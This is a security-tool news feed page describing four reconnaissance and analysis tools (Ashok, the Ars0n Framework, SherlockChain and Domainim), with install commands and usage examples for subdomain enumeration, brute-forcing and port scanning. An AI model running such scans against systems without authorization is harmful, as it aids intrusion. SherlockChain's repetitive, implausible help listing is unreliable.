FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayKitPloit - PenTest Tools!

Ashok - A OSINT Recon Tool, A.K.A Swiss Army Knife

By: Zion3R


Reconnaissance is the first phase of penetration testing which means gathering information before any real attacks are planned So Ashok is an Incredible fast recon tool for penetration tester which is specially designed for Reconnaissance" title="Reconnaissance">Reconnaissance phase. And in Ashok-v1.1 you can find the advanced google dorker and wayback crawling machine.



Main Features

- Wayback Crawler Machine
- Google Dorking without limits
- Github Information Grabbing
- Subdomain Identifier
- Cms/Technology Detector With Custom Headers

Installation

~> git clone https://github.com/ankitdobhal/Ashok
~> cd Ashok
~> python3.7 -m pip3 install -r requirements.txt

How to use Ashok?

A detailed usage guide is available on Usage section of the Wiki.

But Some index of options is given below:

Docker

Ashok can be launched using a lightweight Python3.8-Alpine Docker image.

$ docker pull powerexploit/ashok-v1.2
$ docker container run -it powerexploit/ashok-v1.2 --help


    Credits



    Ars0N-Framework - A Modern Framework For Bug Bounty Hunting

    By: Zion3R



    Howdy! My name is Harrison Richardson, or rs0n (arson) when I want to feel cooler than I really am. The code in this repository started as a small collection of scripts to help automate many of the common Bug Bounty hunting processes I found myself repeating. Over time, I built a simple web application with a MongoDB connection to manage my findings and identify valuable data points. After 5 years of Bug Bounty hunting, both part-time and full-time, I'm finally ready to package this collection of tools into a proper framework.


    The Ars0n Framework is designed to provide aspiring Application Security Engineers with all the tools they need to leverage Bug Bounty hunting as a means to learn valuable, real-world AppSec concepts and make πŸ’° doing it! My goal is to lower the barrier of entry for Bug Bounty hunting by providing easy-to-use automation tools in combination with educational content and how-to guides for a wide range of Web-based and Cloud-based vulnerabilities. In combination with my YouTube content, this framework will help aspiring Application Security Engineers to quickly and easily understand real-world security concepts that directly translate to a high paying career in Cyber Security.

    In addition to using this tool for Bug Bounty Hunting, aspiring engineers can also use this Github Repository as a canvas to practice collaborating with other developers! This tool was inspired by Metasploit and designed to be modular in a similar way. Each Script (Ex: wildfire.py or slowburn.py) is basically an algorithm that runs the Modules (Ex: fire-starter.py or fire-scanner.py) in a specific patter for a desired result. Because of this design, the community is free to build new Scripts to solve a specific use-case or Modules to expand the results of these Scripts. By learning the code in this framework and using Github to contribute your own code, aspiring engineers will continue to learn real-world skills that can be applied on the first day of a Security Engineer I position.

    My hope is that this modular framework will act as a canvas to help share what I've learned over my career to the next generation of Security Engineers! Trust me, we need all the help we can get!!


    Quick Start

    Paste this code block into a clean installation of Kali Linux 2023.4 to download, install, and run the latest stable Alpha version of the framework:

    sudo apt update && sudo apt-get update
    sudo apt -y upgrade && sudo apt-get -y upgrade
    wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
    tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
    rm ars0n-framework-v0.0.2-alpha.tar.gz
    cd ars0n-framework
    ./install.sh

    Download Latest Stable ALPHA Version

    wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
    tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
    rm ars0n-framework-v0.0.2-alpha.tar.gz

    Install

    The Ars0n Framework includes a script that installs all the necessary tools, packages, etc. that are needed to run the framework on a clean installation of Kali Linux 2023.4.

    Please note that the only supported installation of this framework is on a clean installation of Kali Linux 2023.3. If you choose to try and run the framework outside of a clean Kali install, I will not be able to help troubleshoot if you have any issues.

    ./install.sh

    This video shows exactly what to expect from a successful installation.

    If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts

    ./install.sh --arm

    You will be prompted to enter various API keys and tokens when the installation begins. Entering these is not required to run the core functionality of the framework. If you do not enter these API keys and tokens at the time of installation, simply hit enter at each of the prompts. The keys can be added later to the ~/.keys directory. More information about how to add these keys manually can be found in the Frequently Asked Questions section of this README.

    Run the Web Application (Client and Server)

    Once the installation is complete, you will be given the option to run the application by entering Y. If you choose not the run the application immediately, or if you need to run the application after a reboot, simply navigate to the root directly and run the run.sh bash script.

    ./run.sh

    If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts

    ./run.sh --arm

    Core Modules

    The Ars0n Framework's Core Modules are used to determine the basic scanning logic. Each script is designed to support a specific recon methodology based on what the user is trying to accomplish.

    Wildfire

    At this time, the Wildfire script is the most widely used Core Module in the Ars0n Framework. The purpose of this module is to allow the user to scan multiple targets that allow for testing on any subdomain discovered by the researcher.

    How it works:

    1. The user adds root domains through the Graphical User Interface (GUI) that they wish to scan for hidden subdomains
    2. Wildfire sorts each of these domains based on the last time they were scanned to ensure the domain with the oldest data is scanned first
    3. Wildfire scans each of the domains using the Sub-Modules based on the flags provided by the user.

    Most Wildfire scans take between 8 and 48 hours to complete against a single domain if all Sub-Modules are being run. Variations in this timing can be caused by a number of factors, including the target application and the machine running the framework.

    Also, please note that most data will not show in the GUI until the scan has completed. It's best to try and run the scan overnight or over a weekend, depending on the number of domains being scanned, and return once the scan has complete to move from Recon to Enumeration.

    Running Wildfire:

    Graphical User Interface (GUI)

    Wildfire can be run from the GUI using the Wildfire button on the dashboard. Once clicked, the front-end will use the checkboxes on the screen to determine what flags should be passed to the scanner.

    Please note that running scans from the GUI still has a few bugs and edge cases that haven't been sorted out. If you have any issues, you can simply run the scan form the CLI.

    Command Line Interface (CLI)

    All Core Modules for The Ars0n Framework are stored in the /toolkit directory. Simply navigate to the directory and run wildfire.py with the necessary flags. At least one Sub-Module flag must be provided.

    python3 wildfire.py --start --cloud --scan

    Slowburn

    Unlike the Wildfire module, which requires the user to identify target domains to scan, the Slowburn module does that work for you. By communicating with APIs for various bug bounty hunting platforms, this script will identify all domains that allow for testing on any discovered subdomain. Once the data has been populated, Slowburn will randomly choose one domain at a time to scan in the same way Wildfire does.

    Please note that the Slowburn module is still in development and is not considered part of the stable alpha release. There will likely be bugs and edge cases encountered by the user.

    In order for Slowburn to identify targets to scan, it must first be initialized. This initialization step collects the necessary data from various API's and deposits them into a JSON file stored locally. Once this initialization step is complete, Slowburn will automatically begin selecting and scanning one target at a time.

    To initalize Slowburn, simply run the following command:

    python3 slowburn.py --initialize

    Once the data has been collected, it is up to the user whether they want to re-initialize the tool upon the next scan.

    Remember that the scope and targets on public bug bounty programs can change frequently. If you choose to run Slowburn without initializing the data, you may be scanning domains that are no longer in scope for the program. It is strongly recommended that Slowburn be re-initialized each time before running.

    If you choose not to re-initialize the target data, you can run Slowburn using the previously collected data with the following command:

    python3 slowburn.py

    Sub-Modules

    The Ars0n Framework's Sub-Modules are designed to be leveraged by the Core Modules to divide the Recon & Enumeration phases into specific tasks. The data collected in each Sub-Module is used by the others to expand your picture of the target's attack surface.

    Fire-Starter

    Fire-Starter is the first step to performing recon against a target domain. The goal of this script is to collect a wealth of information about the attack surface of your target. Once collected, this data will be used by all other Sub-Modules to help the user identify a specific URL that is potentially vulnerable.

    Fire-Starter works by running a series of open-source tools to enumerate hidden subdomains, DNS records, and the ASN's to identify where those external entries are hosted. Currently, Fire-Starter works by chaining together the following widely used open-source tools:

    • Amass
    • Sublist3r
    • Assetfinder
    • Get All URL's (GAU)
    • Certificate Transparency Logs (CRT)
    • Subfinder
    • ShuffleDNS
    • GoSpider
    • Subdomainizer

    These tools cover a wide range of techniques to identify hidden subdomains, including web scraping, brute force, and crawling to identify links and JavaScript URLs.

    Once the scan is complete, the Dashboard will be updated and available to the user.

    Most Sub-Modules in The Ars0n Framework requre the data collected from the Fire-Starter module to work. With this in mind, Fire-Starter must be included in the first scan against a target for any usable data to be collected.

    Fire-Cloud

    Coming soon...

    Fire-Scanner

    Fire-Scanner uses the results of Fire-Starter and Fire-Cloud to perform Wide-Band Scanning against all subdomains and cloud services that have been discovered from previous scans.

    At this stage of development, this script leverages Nuclei almost exclusively for all scanning. Instead of simply running the tool, Fire-Scanner breaks the scan down into specific collections of Nuclei Templates and scans them one by one. This strategy helps ensure the scans are stable and produce consistent results, removes any unnecessary or unsafe scan checks, and produces actionable results.

    Troubleshooting

    The vast majority of issues installing and/or running the Ars0n Framework are caused by not installing the tool on a clean installation of Kali Linux.

    It is important to remember that, at its core, the Ars0n Framework is a collection of automation scripts designed to run existing open-source tools. Each of these tools have their own ways of operating and can experience unexpected behavior if conflicts emerge with any existing service/tool running on the user's system. This complexity is the reason why running The Ars0n Framework should only be run on a clean installation of Kali Linux.

    Another very common issue users experience is caused by MongoDB not successfully installing and/or running on their machine. The most common manifestation of this issue is the user is unable to add an initial FQDN and simply sees a broken GUI. If this occurs, please ensure that your machine has the necessary system requirements to run MongoDB. Unfortunately, there is no current solution if you run into this issue.

    Frequently Asked Questions

    Coming soon...



    SherlockChain - A Streamlined AI Analysis Framework For Solidity, Vyper And Plutus Contracts

    By: Zion3R


    SherlockChain is a powerful smart contract analysis framework that combines the capabilities of the renowned Slither tool with advanced AI-powered features. Developed by a team of security experts and AI researchers, SherlockChain offers unparalleled insights and vulnerability detection for Solidity, Vyper and Plutus smart contracts.


    Key Features

    • Comprehensive Vulnerability Detection: SherlockChain's suite of detectors identifies a wide range of vulnerabilities, including high-impact issues like reentrancy, unprotected upgrades, and more.
    • AI-Powered Analysis: Integrated AI models enhance the accuracy and precision of vulnerability detection, providing developers with actionable insights and recommendations.
    • Seamless Integration: SherlockChain seamlessly integrates with popular development frameworks like Hardhat, Foundry, and Brownie, making it easy to incorporate into your existing workflow.
    • Intuitive Reporting: SherlockChain generates detailed reports with clear explanations and code snippets, helping developers quickly understand and address identified issues.
    • Customizable Analyses: The framework's flexible API allows users to write custom analyses and detectors, tailoring the tool to their specific needs.
    • Continuous Monitoring: SherlockChain can be integrated into your CI/CD pipeline, providing ongoing monitoring and alerting for your smart contract codebase.

    Installation

    To install SherlockChain, follow these steps:

    git clone https://github.com/0xQuantumCoder/SherlockChain.git
    cd SherlockChain
    pip install .

    AI-Powered Features

    SherlockChain's AI integration brings several advanced capabilities to the table:

    1. Intelligent Vulnerability Prioritization: AI models analyze the context and potential impact of detected vulnerabilities, providing developers with a prioritized list of issues to address.
    2. Automated Remediation Suggestions: The AI component suggests potential fixes and code modifications to address identified vulnerabilities, accelerating the remediation process.
    3. Proactive Security Auditing: SherlockChain's AI models continuously monitor your codebase, proactively identifying emerging threats and providing early warning signals.
    4. Natural Language Interaction: Users can interact with SherlockChain using natural language, allowing them to query the tool, request specific analyses, and receive detailed responses. he --help command in the SherlockChain framework provides a comprehensive overview of all the available options and features. It includes information on:

    5. Vulnerability Detection: The --detect and --exclude-detectors options allow users to specify which vulnerability detectors to run, including both built-in and AI-powered detectors.

    6. Reporting: The --report-format, --report-output, and various --report-* options control how the analysis results are reported, including the ability to generate reports in different formats (JSON, Markdown, SARIF, etc.).
    7. Filtering: The --filter-* options enable users to filter the reported issues based on severity, impact, confidence, and other criteria.
    8. AI Integration: The --ai-* options allow users to configure and control the AI-powered features of SherlockChain, such as prioritizing high-impact vulnerabilities, enabling specific AI detectors, and managing AI model configurations.
    9. Integration with Development Frameworks: Options like --truffle and --truffle-build-directory facilitate the integration of SherlockChain into popular development frameworks like Truffle.
    10. Miscellaneous Options: Additional options for compiling contracts, listing detectors, and customizing the analysis process.

    The --help command provides a detailed explanation of each option, its purpose, and how to use it, making it a valuable resource for users to quickly understand and leverage the full capabilities of the SherlockChain framework.

    Example usage:

    sherlockchain --help

    This will display the comprehensive usage guide for the SherlockChain framework, including all available options and their descriptions.

    usage: sherlockchain [-h] [--version] [--solc-remaps SOLC_REMAPS] [--solc-settings SOLC_SETTINGS]
    [--solc-version SOLC_VERSION] [--truffle] [--truffle-build-directory TRUFFLE_BUILD_DIRECTORY]
    [--truffle-config-file TRUFFLE_CONFIG_FILE] [--compile] [--list-detectors]
    [--list-detectors-info] [--detect DETECTORS] [--exclude-detectors EXCLUDE_DETECTORS]
    [--print-issues] [--json] [--markdown] [--sarif] [--text] [--zip] [--output OUTPUT]
    [--filter-paths FILTER_PATHS] [--filter-paths-exclude FILTER_PATHS_EXCLUDE]
    [--filter-contracts FILTER_CONTRACTS] [--filter-contracts-exclude FILTER_CONTRACTS_EXCLUDE]
    [--filter-severity FILTER_SEVERITY] [--filter-impact FILTER_IMPACT]
    [--filter-confidence FILTER_CONFIDENCE] [--filter-check-suicidal]
    [--filter-check-upgradeable] [--f ilter-check-erc20] [--filter-check-erc721]
    [--filter-check-reentrancy] [--filter-check-gas-optimization] [--filter-check-code-quality]
    [--filter-check-best-practices] [--filter-check-ai-detectors] [--filter-check-all]
    [--filter-check-none] [--check-all] [--check-suicidal] [--check-upgradeable]
    [--check-erc20] [--check-erc721] [--check-reentrancy] [--check-gas-optimization]
    [--check-code-quality] [--check-best-practices] [--check-ai-detectors] [--check-none]
    [--check-all-detectors] [--check-all-severity] [--check-all-impact] [--check-all-confidence]
    [--check-all-categories] [--check-all-filters] [--check-all-options] [--check-all]
    [--check-none] [--report-format {json,markdown,sarif,text,zip}] [--report-output OUTPUT]
    [--report-severity REPORT_SEVERITY] [--report-impact R EPORT_IMPACT]
    [--report-confidence REPORT_CONFIDENCE] [--report-check-suicidal]
    [--report-check-upgradeable] [--report-check-erc20] [--report-check-erc721]
    [--report-check-reentrancy] [--report-check-gas-optimization] [--report-check-code-quality]
    [--report-check-best-practices] [--report-check-ai-detectors] [--report-check-all]
    [--report-check-none] [--report-all] [--report-suicidal] [--report-upgradeable]
    [--report-erc20] [--report-erc721] [--report-reentrancy] [--report-gas-optimization]
    [--report-code-quality] [--report-best-practices] [--report-ai-detectors] [--report-none]
    [--report-all-detectors] [--report-all-severity] [--report-all-impact]
    [--report-all-confidence] [--report-all-categories] [--report-all-filters]
    [--report-all-options] [- -report-all] [--report-none] [--ai-enabled] [--ai-disabled]
    [--ai-priority-high] [--ai-priority-medium] [--ai-priority-low] [--ai-priority-all]
    [--ai-priority-none] [--ai-confidence-high] [--ai-confidence-medium] [--ai-confidence-low]
    [--ai-confidence-all] [--ai-confidence-none] [--ai-detectors-all] [--ai-detectors-none]
    [--ai-detectors-specific AI_DETECTORS_SPECIFIC] [--ai-detectors-exclude AI_DETECTORS_EXCLUDE]
    [--ai-models-path AI_MODELS_PATH] [--ai-models-update] [--ai-models-download]
    [--ai-models-list] [--ai-models-info] [--ai-models-version] [--ai-models-check]
    [--ai-models-upgrade] [--ai-models-remove] [--ai-models-clean] [--ai-models-reset]
    [--ai-models-backup] [--ai-models-restore] [--ai-models-export] [--ai-models-import]
    [--ai-models-config AI_MODELS_CONFIG] [--ai-models-config-update] [--ai-models-config-reset]
    [--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-list]
    [--ai-models-config-info] [--ai-models-config-version] [--ai-models-config-check]
    [--ai-models-config-upgrade] [--ai-models-config-remove] [--ai-models-config-clean]
    [--ai-models-config-reset] [--ai-models-config-backup] [--ai-models-config-restore]
    [--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-path AI_MODELS_CONFIG_PATH]
    [--ai-models-config-file AI_MODELS_CONFIG_FILE] [--ai-models-config-url AI_MODELS_CONFIG_URL]
    [--ai-models-config-name AI_MODELS_CONFIG_NAME] [--ai-models-config-description AI_MODELS_CONFIG_DESCRIPTION]
    [--ai-models-config-version-major AI_MODELS_CONFIG_VERSION_MAJOR]
    [--ai-models-config- version-minor AI_MODELS_CONFIG_VERSION_MINOR]
    [--ai-models-config-version-patch AI_MODELS_CONFIG_VERSION_PATCH]
    [--ai-models-config-author AI_MODELS_CONFIG_AUTHOR]
    [--ai-models-config-license AI_MODELS_CONFIG_LICENSE]
    [--ai-models-config-url-documentation AI_MODELS_CONFIG_URL_DOCUMENTATION]
    [--ai-models-config-url-source AI_MODELS_CONFIG_URL_SOURCE]
    [--ai-models-config-url-issues AI_MODELS_CONFIG_URL_ISSUES]
    [--ai-models-config-url-changelog AI_MODELS_CONFIG_URL_CHANGELOG]
    [--ai-models-config-url-support AI_MODELS_CONFIG_URL_SUPPORT]
    [--ai-models-config-url-website AI_MODELS_CONFIG_URL_WEBSITE]
    [--ai-models-config-url-logo AI_MODELS_CONFIG_URL_LOGO]
    [--ai-models-config-url-icon AI_MODELS_CONFIG_URL_ICON]
    [--ai-models-config-url-banner AI_MODELS_CONFIG_URL_BANNER]
    [--ai-models-config-url-screenshot AI_MODELS_CONFIG_URL_SCREENSHOT]
    [--ai-models-config-url-video AI_MODELS_CONFIG_URL_VIDEO]
    [--ai-models-config-url-demo AI_MODELS_CONFIG_URL_DEMO]
    [--ai-models-config-url-documentation-api AI_MODELS_CONFIG_URL_DOCUMENTATION_API]
    [--ai-models-config-url-documentation-user AI_MODELS_CONFIG_URL_DOCUMENTATION_USER]
    [--ai-models-config-url-documentation-developer AI_MODELS_CONFIG_URL_DOCUMENTATION_DEVELOPER]
    [--ai-models-config-url-documentation-faq AI_MODELS_CONFIG_URL_DOCUMENTATION_FAQ]
    [--ai-models-config-url-documentation-tutorial AI_MODELS_CONFIG_URL_DOCUMENTATION_TUTORIAL]
    [--ai-models-config-url-documentation-guide AI_MODELS_CONFIG_URL_DOCUMENTATION_GUIDE]
    [--ai-models-config-url-documentation-whitepaper AI_MODELS_CONFIG_URL_DOCUMENTATION_WHITEPAPER]
    [--ai-models-config-url-documentation-roadmap AI_MODELS_CONFIG_URL_DOCUMENTATION_ROADMAP]
    [--ai-models-config-url-documentation-blog AI_MODELS_CONFIG_URL_DOCUMENTATION_BLOG]
    [--ai-models-config-url-documentation-community AI_MODELS_CONFIG_URL_DOCUMENTATION_COMMUNITY]

    This comprehensive usage guide provides information on all the available options and features of the SherlockChain framework, including:

    • Vulnerability detection options: --detect, --exclude-detectors
    • Reporting options: --report-format, --report-output, --report-*
    • Filtering options: --filter-*
    • AI integration options: --ai-*
    • Integration with development frameworks: --truffle, --truffle-build-directory
    • Miscellaneous options: --compile, --list-detectors, --list-detectors-info

    By reviewing this comprehensive usage guide, you can quickly understand how to leverage the full capabilities of the SherlockChain framework to analyze your smart contracts and identify potential vulnerabilities. This will help you ensure the security and reliability of your DeFi protocol before deployment.

    AI-Powered Detectors

    Num Detector What it Detects Impact Confidence
    1 ai-anomaly-detection Detect anomalous code patterns using advanced AI models High High
    2 ai-vulnerability-prediction Predict potential vulnerabilities using machine learning High High
    3 ai-code-optimization Suggest code optimizations based on AI-driven analysis Medium High
    4 ai-contract-complexity Assess contract complexity and maintainability using AI Medium High
    5 ai-gas-optimization Identify gas-optimizing opportunities with AI Medium Medium
    ## Detectors
    Num Detector What it Detects Impact Confidence
    1 abiencoderv2-array Storage abiencoderv2 array High High
    2 arbitrary-send-erc20 transferFrom uses arbitrary from High High
    3 array-by-reference Modifying storage array by value High High
    4 encode-packed-collision ABI encodePacked Collision High High
    5 incorrect-shift The order of parameters in a shift instruction is incorrect. High High
    6 multiple-constructors Multiple constructor schemes High High
    7 name-reused Contract's name reused High High
    8 protected-vars Detected unprotected variables High High
    9 public-mappings-nested Public mappings with nested variables High High
    10 rtlo Right-To-Left-Override control character is used High High
    11 shadowing-state State variables shadowing High High
    12 suicidal Functions allowing anyone to destruct the contract High High
    13 uninitialized-state Uninitialized state variables High High
    14 uninitialized-storage Uninitialized storage variables High High
    15 unprotected-upgrade Unprotected upgradeable contract High High
    16 codex Use Codex to find vulnerabilities. High Low
    17 arbitrary-send-erc20-permit transferFrom uses arbitrary from with permit High Medium
    18 arbitrary-send-eth Functions that send Ether to arbitrary destinations High Medium
    19 controlled-array-length Tainted array length assignment High Medium
    20 controlled-delegatecall Controlled delegatecall destination High Medium
    21 delegatecall-loop Payable functions using delegatecall inside a loop High Medium
    22 incorrect-exp Incorrect exponentiation High Medium
    23 incorrect-return If a return is incorrectly used in assembly mode. High Medium
    24 msg-value-loop msg.value inside a loop High Medium
    25 reentrancy-eth Reentrancy vulnerabilities (theft of ethers) High Medium
    26 return-leave If a return is used instead of a leave. High Medium
    27 storage-array Signed storage integer array compiler bug High Medium
    28 unchecked-transfer Unchecked tokens transfer High Medium
    29 weak-prng Weak PRNG High Medium
    30 domain-separator-collision Detects ERC20 tokens that have a function whose signature collides with EIP-2612's DOMAIN_SEPARATOR() Medium High
    31 enum-conversion Detect dangerous enum conversion Medium High
    32 erc20-interface Incorrect ERC20 interfaces Medium High
    33 erc721-interface Incorrect ERC721 interfaces Medium High
    34 incorrect-equality Dangerous strict equalities Medium High
    35 locked-ether Contracts that lock ether Medium High
    36 mapping-deletion Deletion on mapping containing a structure Medium High
    37 shadowing-abstract State variables shadowing from abstract contracts Medium High
    38 tautological-compare Comparing a variable to itself always returns true or false, depending on comparison Medium High
    39 tautology Tautology or contradiction Medium High
    40 write-after-write Unused write Medium High
    41 boolean-cst Misuse of Boolean constant Medium Medium
    42 constant-function-asm Constant functions using assembly code Medium Medium
    43 constant-function-state Constant functions changing the state Medium Medium
    44 divide-before-multiply Imprecise arithmetic operations order Medium Medium
    45 out-of-order-retryable Out-of-order retryable transactions Medium Medium
    46 reentrancy-no-eth Reentrancy vulnerabilities (no theft of ethers) Medium Medium
    47 reused-constructor Reused base constructor Medium Medium
    48 tx-origin Dangerous usage of tx.origin Medium Medium
    49 unchecked-lowlevel Unchecked low-level calls Medium Medium
    50 unchecked-send Unchecked send Medium Medium
    51 uninitialized-local Uninitialized local variables Medium Medium
    52 unused-return Unused return values Medium Medium
    53 incorrect-modifier Modifiers that can return the default value Low High
    54 shadowing-builtin Built-in symbol shadowing Low High
    55 shadowing-local Local variables shadowing Low High
    56 uninitialized-fptr-cst Uninitialized function pointer calls in constructors Low High
    57 variable-scope Local variables used prior their declaration Low High
    58 void-cst Constructor called not implemented Low High
    59 calls-loop Multiple calls in a loop Low Medium
    60 events-access Missing Events Access Control Low Medium
    61 events-maths Missing Events Arithmetic Low Medium
    62 incorrect-unary Dangerous unary expressions Low Medium
    63 missing-zero-check Missing Zero Address Validation Low Medium
    64 reentrancy-benign Benign reentrancy vulnerabilities Low Medium
    65 reentrancy-events Reentrancy vulnerabilities leading to out-of-order Events Low Medium
    66 return-bomb A low level callee may consume all callers gas unexpectedly. Low Medium
    67 timestamp Dangerous usage of block.timestamp Low Medium
    68 assembly Assembly usage Informational High
    69 assert-state-change Assert state change Informational High
    70 boolean-equal Comparison to boolean constant Informational High
    71 cyclomatic-complexity Detects functions with high (> 11) cyclomatic complexity Informational High
    72 deprecated-standards Deprecated Solidity Standards Informational High
    73 erc20-indexed Un-indexed ERC20 event parameters Informational High
    74 function-init-state Function initializing state variables Informational High
    75 incorrect-using-for Detects using-for statement usage when no function from a given library matches a given type Informational High
    76 low-level-calls Low level calls Informational High
    77 missing-inheritance Missing inheritance Informational High
    78 naming-convention Conformity to Solidity naming conventions Informational High
    79 pragma If different pragma directives are used Informational High
    80 redundant-statements Redundant statements Informational High
    81 solc-version Incorrect Solidity version Informational High
    82 unimplemented-functions Unimplemented functions Informational High
    83 unused-import Detects unused imports Informational High
    84 unused-state Unused state variables Informational High
    85 costly-loop Costly operations in a loop Informational Medium
    86 dead-code Functions that are not used Informational Medium
    87 reentrancy-unlimited-gas Reentrancy vulnerabilities through send and transfer Informational Medium
    88 similar-names Variable names are too similar Informational Medium
    89 too-many-digits Conformance to numeric notation best practices Informational Medium
    90 cache-array-length Detects for loops that use length member of some storage array in their loop condition and don't modify it. Optimization High
    91 constable-states State variables that could be declared constant Optimization High
    92 external-function Public function that could be declared external Optimization High
    93 immutable-states State variables that could be declared immutable Optimization High
    94 var-read-using-this Contract reads its own variable using this Optimization High


    Domainim - A Fast And Comprehensive Tool For Organizational Network Scanning

    By: Zion3R


    Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.


    Features

    Current features (v1.0.1)- - Subdomain enumeration (2 engines + bruteforcing) - User-friendly output - Resolving A records (IPv4)

    A fast and comprehensive tool for organizational network scanning (6)

    A fast and comprehensive tool for organizational network scanning (7)

    • Virtual hostname enumeration
    • Reverse DNS lookup

    A fast and comprehensive tool for organizational network scanning (8)

    • Detects wildcard subdomains (for bruteforcing)

    A fast and comprehensive tool for organizational network scanning (9)

    • Basic TCP port scanning
    • Subdomains are accepted as input

    A fast and comprehensive tool for organizational network scanning (10)

    • Export results to JSON file

    A fast and comprehensive tool for organizational network scanning (11)

    A few features are work in progress. See Planned features for more details.

    The project is inspired by Sublist3r. The port scanner module is heavily based on NimScan.

    Installation

    You can build this repo from source- - Clone the repository

    git clone git@github.com:pptx704/domainim
    • Build the binary
    nimble build
    • Run the binary
    ./domainim <domain> [--ports=<ports>]

    Or, you can just download the binary from the release page. Keep in mind that the binary is tested on Debian based systems only.

    Usage

    ./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
    • <domain> is the domain to be enumerated. It can be a subdomain as well.
    • -- ports | -p is a string speicification of the ports to be scanned. It can be one of the following-
    • all - Scan all ports (1-65535)
    • none - Skip port scanning (default)
    • t<n> - Scan top n ports (same as nmap). i.e. t100 scans top 100 ports. Max value is 5000. If n is greater than 5000, it will be set to 5000.
    • single value - Scan a single port. i.e. 80 scans port 80
    • range value - Scan a range of ports. i.e. 80-100 scans ports 80 to 100
    • comma separated values - Scan multiple ports. i.e. 80,443,8080 scans ports 80, 443 and 8080
    • combination - Scan a combination of the above. i.e. 80,443,8080-8090,t500 scans ports 80, 443, 8080 to 8090 and top 500 ports
    • --dns | -d is the address of the dns server. This should be a valid IPv4 address and can optionally contain the port number-
    • a.b.c.d - Use DNS server at a.b.c.d on port 53
    • a.b.c.d#n - Use DNS server at a.b.c.d on port e
    • --wordlist | -l - Path to the wordlist file. This is used for bruteforcing subdomains. If the file is invalid, bruteforcing will be skipped. You can get a wordlist from SecLists. A wordlist is also provided in the release page.
    • --rps | -r - Number of requests to be made per second during bruteforce. The default value is 1024 req/s. It is to be noted that, DNS queries are made in batches and next batch is made only after the previous one is completed. Since quries can be rate limited, increasing the value does not always guarantee faster results.
    • --out | -o - Path to the output file. The output will be saved in JSON format. The filename must end with .json.

    Examples - ./domainim nmap.org --ports=all - ./domainim google.com --ports=none --dns=8.8.8.8#53 - ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500 - ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --outfile=results.json - ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1

    The help menu can be accessed using ./domainim --help or ./domainim -h.

    Usage:
    domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
    domainim (-h | --help)

    Options:
    -h, --help Show this screen.
    -p, --ports Ports to scan. [default: `none`]
    Can be `all`, `none`, `t<n>`, single value, range value, combination
    -l, --wordlist Wordlist for subdomain bruteforcing. Bruteforcing is skipped for invalid file.
    -d, --dns IP and Port for DNS Resolver. Should be a valid IPv4 with an optional port [default: system default]
    -r, --rps DNS queries to be made per second [default: 1024 req/s]
    -o, --out JSON file where the output will be saved. Filename must end with `.json`

    Examples:
    domainim domainim.com -p:t500 -l:wordlist.txt --dns:1.1.1.1#53 --out=results.json
    domainim sub.domainim.com --ports=all --dns:8.8.8.8 -t:1500 -o:results.json

    The JSON schema for the results is as follows-

    [
    {
    "subdomain": string,
    "data": [
    "ipv4": string,
    "vhosts": [string],
    "reverse_dns": string,
    "ports": [int]
    ]
    }
    ]

    Example json for nmap.org can be found here.

    Contributing

    Contributions are welcome. Feel free to open a pull request or an issue.

    Planned Features

    • [x] TCP port scanning
    • [ ] UDP port scanning support
    • [ ] Resolve AAAA records (IPv6)
    • [x] Custom DNS server
    • [x] Add bruteforcing subdomains using a wordlist
    • [ ] Force bruteforcing (even if wildcard subdomain is found)
    • [ ] Add more engines for subdomain enumeration
    • [x] File output (JSON)
    • [ ] Multiple domain enumeration
    • [ ] Dir and File busting

    Others

    • [x] Update verbose output when encountering errors (v0.2.0)
    • [x] Show progress bar for longer operations
    • [ ] Add individual port scan progress bar
    • [ ] Add tests
    • [ ] Add comments and docstrings

    Additional Notes

    This project is still in its early stages. There are several limitations I am aware of.

    The two engines I am using (I'm calling them engine because Sublist3r does so) currently have some sort of response limit. dnsdumpster.com">dnsdumpster can fetch upto 100 subdomains. crt.sh also randomizes the results in case of too many results. Another issue with crt.sh is the fact that it returns some SQL error sometimes. So for some domain, results can be different for different runs. I am planning to add more engines in the future (at least a brute force engine).

    The port scanner has only ping response time + 750ms timeout. This might lead to false negatives. Since, domainim is not meant for port scanning but to provide a quick overview, such cases are acceptable. However, I am planning to add a flag to increase the timeout. For the same reason, filtered ports are not shown. For more comprehensive port scanning, I recommend using Nmap. Domainim also doesn't bypass rate limiting (if there is any).

    It might seem that the way vhostnames are printed, it just brings repeition on the table.

    A fast and comprehensive tool for organizational network scanning (12)

    Printing as the following might've been better-

    ack.nmap.org, issues.nmap.org, nmap.org, research.nmap.org, scannme.nmap.org, svn.nmap.org, www.nmap.org
    ↳ 45.33.49.119
    ↳ Reverse DNS: ack.nmap.org.

    But previously while testing, I found cases where not all IPs are shared by same set of vhostnames. That is why I decided to keep it this way.

    A fast and comprehensive tool for organizational network scanning (13)

    DNS server might have some sort of rate limiting. That's why I added random delays (between 0-300ms) for IPv4 resolving per query. This is to not make the DNS server get all the queries at once but rather in a more natural way. For bruteforcing method, the value is between 0-1000ms by default but that can be changed using --rps | -t flag.

